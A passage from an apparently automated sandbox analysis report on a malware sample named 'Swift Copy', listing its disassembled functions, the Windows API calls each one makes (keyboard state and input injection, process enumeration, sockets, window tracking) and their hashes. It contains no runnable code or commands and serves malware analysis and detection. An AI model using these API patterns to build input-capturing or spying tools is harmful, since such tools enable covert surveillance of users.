                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Menu$InfoItem$Draw
                                              • String ID: 0
                                              • API String ID: 3227129158-4108050209
                                              • Opcode ID: 742a0e215006aceef509b23bb96b2abca134cf0cecd7a310a13adeb5fcee6a49
                                              • Instruction ID: 4f722820af6a7c6d91536fa6f656b5ca7bab9270699fa0a8d9a7a7679ec33a57
                                              • Opcode Fuzzy Hash: 742a0e215006aceef509b23bb96b2abca134cf0cecd7a310a13adeb5fcee6a49
                                              • Instruction Fuzzy Hash: A2013536500218EEDB219F51DC44BABBBB4FB85365F1080A9E859E6191DB308AD4EF31
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9937649dd65c5e7e07bc2ca43804987a5f616458977048fa195fa7edd1e63b49
                                              • Instruction ID: 54f604a50c128869272fb731f8cb069d1eb25ac76549ce8d382332ca54d1de77
                                              • Opcode Fuzzy Hash: 9937649dd65c5e7e07bc2ca43804987a5f616458977048fa195fa7edd1e63b49
                                              • Instruction Fuzzy Hash: F5C12A75A00206AFDB14CFA8C894BAEBBB5FF88704F248599E505EB251D731DE41CBA4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInitInitializeUninitialize
                                              • String ID:
                                              • API String ID: 1998397398-0
                                              • Opcode ID: 6653d478ae54711c09e792408e325b7a5167685ea660b03ce6eb88ef3e67dfe0
                                              • Instruction ID: c1e41ec9c78bec429dd744c7df617a496e39d11593ab9b022492f3d038fd2a7f
                                              • Opcode Fuzzy Hash: 6653d478ae54711c09e792408e325b7a5167685ea660b03ce6eb88ef3e67dfe0
                                              • Instruction Fuzzy Hash: D4A11B756042049FC710EF28C485A2AB7E5FF88714F16C959F9899B362DB30EE45CBB1
                                              APIs
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E0FC08,?), ref: 00DD05F0
                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E0FC08,?), ref: 00DD0608
                                              • CLSIDFromProgID.OLE32(?,?,00000000,00E0CC40,000000FF,?,00000000,00000800,00000000,?,00E0FC08,?), ref: 00DD062D
                                              • _memcmp.LIBVCRUNTIME ref: 00DD064E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: FromProg$FreeTask_memcmp
                                              • String ID:
                                              • API String ID: 314563124-0
                                              • Opcode ID: bc34f470800bc06339212b1688ce85aba694233a3ab1eb8111531c1d6fb30dff
                                              • Instruction ID: 82a7010ea35f44a51ca74c5a55d912509631d6e23eaf7438e6fafd5bf8108107
                                              • Opcode Fuzzy Hash: bc34f470800bc06339212b1688ce85aba694233a3ab1eb8111531c1d6fb30dff
                                              • Instruction Fuzzy Hash: 5A811B71A00109EFCB04DF94C984EEEBBB9FF89315F244599E506AB250DB71AE46CF60
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: 989f9017cdf11c90bc0a99fb6329608d62f6917f71bd171a7d6ea34c92dc3cd0
                                              • Instruction ID: 9c95df781ba9c60e93f20fa1d46b7b43211ce338b526dc8558ffae89722aaa8b
                                              • Opcode Fuzzy Hash: 989f9017cdf11c90bc0a99fb6329608d62f6917f71bd171a7d6ea34c92dc3cd0
                                              • Instruction Fuzzy Hash: 8B417D39A00210EBDF217BFD9C56BFE3AE4EF46770F684225F41AD3192EA7489415272
                                              APIs
                                              • GetWindowRect.USER32(00F4F440,?), ref: 00E062E2
                                              • ScreenToClient.USER32(?,?), ref: 00E06315
                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00E06382
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$ClientMoveRectScreen
                                              • String ID:
                                              • API String ID: 3880355969-0
                                              • Opcode ID: f6106702e98f9ef7ab2293fde97fd00f47635314c6adbd6cc3db59055adee3d9
                                              • Instruction ID: afdb694d677cc4b45e2912760ea19469a3d7b1619b32620a158e0ba9c54fcf4d
                                              • Opcode Fuzzy Hash: f6106702e98f9ef7ab2293fde97fd00f47635314c6adbd6cc3db59055adee3d9
                                              • Instruction Fuzzy Hash: 20514D74900209EFDF20DF68D880AAE7BB5FB95364F109259F915AB2E0D734ED91CB90
                                              APIs
                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00DF1AFD
                                              • WSAGetLastError.WSOCK32 ref: 00DF1B0B
                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DF1B8A
                                              • WSAGetLastError.WSOCK32 ref: 00DF1B94
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorLast$socket
                                              • String ID:
                                              • API String ID: 1881357543-0
                                              • Opcode ID: f7e2cc302b64ffc8aa49af731c073ac035e808bb43a997163e2d3425c60a7612
                                              • Instruction ID: 63e66ad7cd8a8a6b0d86669d1ff43f08bc9e1674a583e22a9d65d96f46b7cca5
                                              • Opcode Fuzzy Hash: f7e2cc302b64ffc8aa49af731c073ac035e808bb43a997163e2d3425c60a7612
                                              • Instruction Fuzzy Hash: C7417238640200AFD720AF24C886F2977E5EB45718F58C558FA599F2D3E672DD41CBB0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 477b7990f189161dafc9ec21cdf157a0eefa357850c911702b88953b16b30f06
                                              • Instruction ID: 604279da94cdc24037814d3e1532c8dc94ed50b3482241176a6e39e5633b037e
                                              • Opcode Fuzzy Hash: 477b7990f189161dafc9ec21cdf157a0eefa357850c911702b88953b16b30f06
                                              • Instruction Fuzzy Hash: 1D41E875A00704AFD7249F78CC41BAABBE9EB89724F10452FF551DB282D7B1E94287B0
                                              APIs
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DE5783
                                              • GetLastError.KERNEL32(?,00000000), ref: 00DE57A9
                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DE57CE
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DE57FA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                              • String ID:
                                              • API String ID: 3321077145-0
                                              • Opcode ID: a770205c8643c416197cb15f181eddd76ef6f7466db51a5f802956af928845b6
                                              • Instruction ID: 6b03a303237c8614bd819d6899a827bbd0bff393d444084919636c134197fe44
                                              • Opcode Fuzzy Hash: a770205c8643c416197cb15f181eddd76ef6f7466db51a5f802956af928845b6
                                              • Instruction Fuzzy Hash: 58411E35600610DFCB11EF15C584A5DBBE2EF89724B19C889E84A6B362DB35FD41CBB1
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00D96D71,00000000,00000000,00D982D9,?,00D982D9,?,00000001,00D96D71,8BE85006,00000001,00D982D9,00D982D9), ref: 00DAD910
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DAD999
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00DAD9AB
                                              • __freea.LIBCMT ref: 00DAD9B4
                                                • Part of subcall function 00DA3820: RtlAllocateHeap.NTDLL(00000000,?,00E41444,?,00D8FDF5,?,?,00D7A976,00000010,00E41440,00D713FC,?,00D713C6,?,00D71129), ref: 00DA3852
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                              • String ID:
                                              • API String ID: 2652629310-0
                                              • Opcode ID: 7fb200aff6f33bd22fe68e15586b429b4880844ad3567749e9dd3e3db1e8e41c
                                              • Instruction ID: b1cee58c1fe44fdccd73f5c0109cc6b71ceb0bad1d95f48be6f5dbfb1b1cf3c4
                                              • Opcode Fuzzy Hash: 7fb200aff6f33bd22fe68e15586b429b4880844ad3567749e9dd3e3db1e8e41c
                                              • Instruction Fuzzy Hash: 4431AE72A0020AAFDF249F65DC45EAF7BA6EB42710B194268FC05E6150EB35CD54CBB0
                                              APIs
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00E05352
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E05375
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E05382
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E053A8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: LongWindow$InvalidateMessageRectSend
                                              • String ID:
                                              • API String ID: 3340791633-0
                                              • Opcode ID: 31edac691585cc1ee65f84ac612f07fed99316ad4c5aa1e28989161708a7675a
                                              • Instruction ID: 2857d02ed7418d70978a05e510de2e19db2837fbc5264b14f4d1ca60b1871a95
                                              • Opcode Fuzzy Hash: 31edac691585cc1ee65f84ac612f07fed99316ad4c5aa1e28989161708a7675a
                                              • Instruction Fuzzy Hash: E7310036A55A08EFEF309F14CC06BEA7765EB05394F586501FA00B62E4C7B9A9C0DF52
                                              APIs
                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00DDABF1
                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00DDAC0D
                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00DDAC74
                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00DDACC6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: a84248dc6e17335f16b4e0df5d77cd90ad309fdfeeb83b96ff3453934c1158a9
                                              • Instruction ID: 98f380a15be8d80cb1bb11538910456af382025aaa92b99223f4debc1aeb2c71
                                              • Opcode Fuzzy Hash: a84248dc6e17335f16b4e0df5d77cd90ad309fdfeeb83b96ff3453934c1158a9
                                              • Instruction Fuzzy Hash: 29310634A60618AFEF35CB6D8C047FA7BA5AB89330F18831BE485923D1C375C9858772
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 00E0769A
                                              • GetWindowRect.USER32(?,?), ref: 00E07710
                                              • PtInRect.USER32(?,?,00E08B89), ref: 00E07720
                                              • MessageBeep.USER32(00000000), ref: 00E0778C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Rect$BeepClientMessageScreenWindow
                                              • String ID:
                                              • API String ID: 1352109105-0
                                              • Opcode ID: 6be56e9544dc67055f06baa32c353a52d5972bc1b6ba4a06658cec4fcc66f693
                                              • Instruction ID: c82ef3c531f0d96d03755cc165ee62deb9432f2cd1ec520ce0564e6eab7d9832
                                              • Opcode Fuzzy Hash: 6be56e9544dc67055f06baa32c353a52d5972bc1b6ba4a06658cec4fcc66f693
                                              • Instruction Fuzzy Hash: 5A41BF38A05214DFCB01CF59C894EA977F0FB49345F1851AAE994AB2A0C331F9C6CF90
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00E016EB
                                                • Part of subcall function 00DD3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD3A57
                                                • Part of subcall function 00DD3A3D: GetCurrentThreadId.KERNEL32 ref: 00DD3A5E
                                                • Part of subcall function 00DD3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD25B3), ref: 00DD3A65
                                              • GetCaretPos.USER32(?), ref: 00E016FF
                                              • ClientToScreen.USER32(00000000,?), ref: 00E0174C
                                              • GetForegroundWindow.USER32 ref: 00E01752
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                              • String ID:
                                              • API String ID: 2759813231-0
                                              • Opcode ID: 1214bd068b52b992bc637aeca529d38eb284938a2d0a1f7688441bec0eee2310
                                              • Instruction ID: 5434a61025a2c9d93b2f60daf232cf3b02c906a72c6a0da0a754443e4da2d836
                                              • Opcode Fuzzy Hash: 1214bd068b52b992bc637aeca529d38eb284938a2d0a1f7688441bec0eee2310
                                              • Instruction Fuzzy Hash: 20313075D01149AFC704EFAAC881CAEBBF9EF89304B5480AAE415E7251E731DE45CBB1
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00DDD501
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00DDD50F
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00DDD52F
                                              • CloseHandle.KERNEL32(00000000), ref: 00DDD5DC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 420147892-0
                                              • Opcode ID: 3afa90ca4fff0ff944b8fb9f1ceeb5ad8f9b1feaa84938b2dcd174d3eca681ee
                                              • Instruction ID: 32cc3e0f03a19f802569ba3508772d7002dbf5dc8a35e69d85c0b473ba15200d
                                              • Opcode Fuzzy Hash: 3afa90ca4fff0ff944b8fb9f1ceeb5ad8f9b1feaa84938b2dcd174d3eca681ee
                                              • Instruction Fuzzy Hash: 033190720082009FD701EF54D881AAFBBF8EF99354F14452DF585962A1EB719949CBB2
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • GetCursorPos.USER32(?), ref: 00E09001
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DC7711,?,?,?,?,?), ref: 00E09016
                                              • GetCursorPos.USER32(?), ref: 00E0905E
                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DC7711,?,?,?), ref: 00E09094
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
